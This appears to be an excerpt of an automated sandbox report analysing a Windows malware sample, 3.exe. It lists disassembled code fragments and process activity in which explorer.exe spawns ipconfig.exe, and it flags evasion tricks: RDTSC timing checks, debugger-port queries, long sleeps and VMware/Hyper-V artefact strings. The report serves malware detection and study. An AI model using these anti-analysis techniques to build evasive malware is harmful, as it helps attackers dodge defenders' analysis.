          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230927C push 0040C2C8h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230927C push 0040C2C8h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230936A push 0040C33Bh; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230936A push 0040C33Bh; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02302BF0 push 00405BA1h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023093E4 push 0040C378h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023093E4 push 0040C378h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023033C8 push 00406354h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02304820 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02304820 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02304820 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02304820 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023030B6 push 00406044h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023030B8 push 00406044h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02300094 push eax; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02302ED0 push 00405E5Ch; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02302ECE push 00405E5Ch; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02308F1A push 0040C2C8h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02308F1A push 0040C2C8h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02302F08 push 00405E94h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023075B0 push eax; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023075B0 push eax; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023075B0 push eax; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023075B0 push eax; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230927C push 0040C2C8h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230927C push 0040C2C8h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230936A push 0040C33Bh; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230936A push 0040C33Bh; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02302BF0 push 00405BA1h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023093E4 push 0040C378h; ret
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_023093E4 push 0040C378h; ret

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\3.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\3.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000001185E4 second address: 00000000001185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000011896E second address: 0000000000118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004088A0 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 5680Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.270082928.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.270082928.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.261950637.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000005.00000000.269457825.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.267696288.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.293624505.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.270082928.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.270082928.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.270166589.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.293662200.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.267696288.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.267696288.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.267696288.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\3.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\3.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B523E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
